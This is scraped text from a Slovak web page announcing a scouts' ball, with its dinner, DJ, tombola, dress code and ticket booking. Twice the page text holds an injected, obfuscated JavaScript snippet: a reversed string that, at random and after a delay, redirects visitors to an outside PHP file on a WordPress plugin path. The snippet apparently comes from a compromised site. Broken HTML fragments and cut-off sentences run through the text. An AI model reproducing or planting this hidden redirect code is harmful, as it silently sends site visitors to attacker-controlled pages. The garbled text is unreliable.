$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom after 0.4s“ data-scroll-reveal-id=“2″ data-scroll-reveal-initialized=“true“ data-scroll-reveal-complete=“true“>Tešiť sa môžete na skvelú zábavu až do rána, výborný program, chutnú večeru a bohatú tombolu. Príďte sa zabaviť a presvedčte sa na vlastné oči, že skauti to dokážu tiež poriadne roztočiť.

tom ples odštartujeme úvodným príhovorom.
Nasledovať bude slávnostná večera pozostávajúca z troch chodov a ďalší program. Nebude chýbať dostatok tanečných kôl, tombola s hodnotnými cenami a polnočné občerstvenie formou bufetu.

tom, s ktorým sme dlhoročne spokojní my aj naši hostia. Do tanca nám bude hrať rokmi overený DJ Red – Roman Boldiš. Počas večera vystriedame viacero štýlov tak, aby si mohol zatancovať každý, od milovníka vážnej hudby cez súčasnú pop music až po oldies retro Mariky Gombitovej. Dresscode nemusí  byť práve „Black tie“, u pánov by sme však radi videli aspoň sako s kravatou. Dámy si na výbere šiat dajú záležať aj bez našich rád. 🙂

$mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„‚php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom after 0.4s“ data-scroll-reveal-id=“2″ data-scroll-reveal-initialized=“true“ data-scroll-reveal-complete=“true“>Rezerváciu vstupeniek aj viac informácii nájdete na www.skautskyples.sk!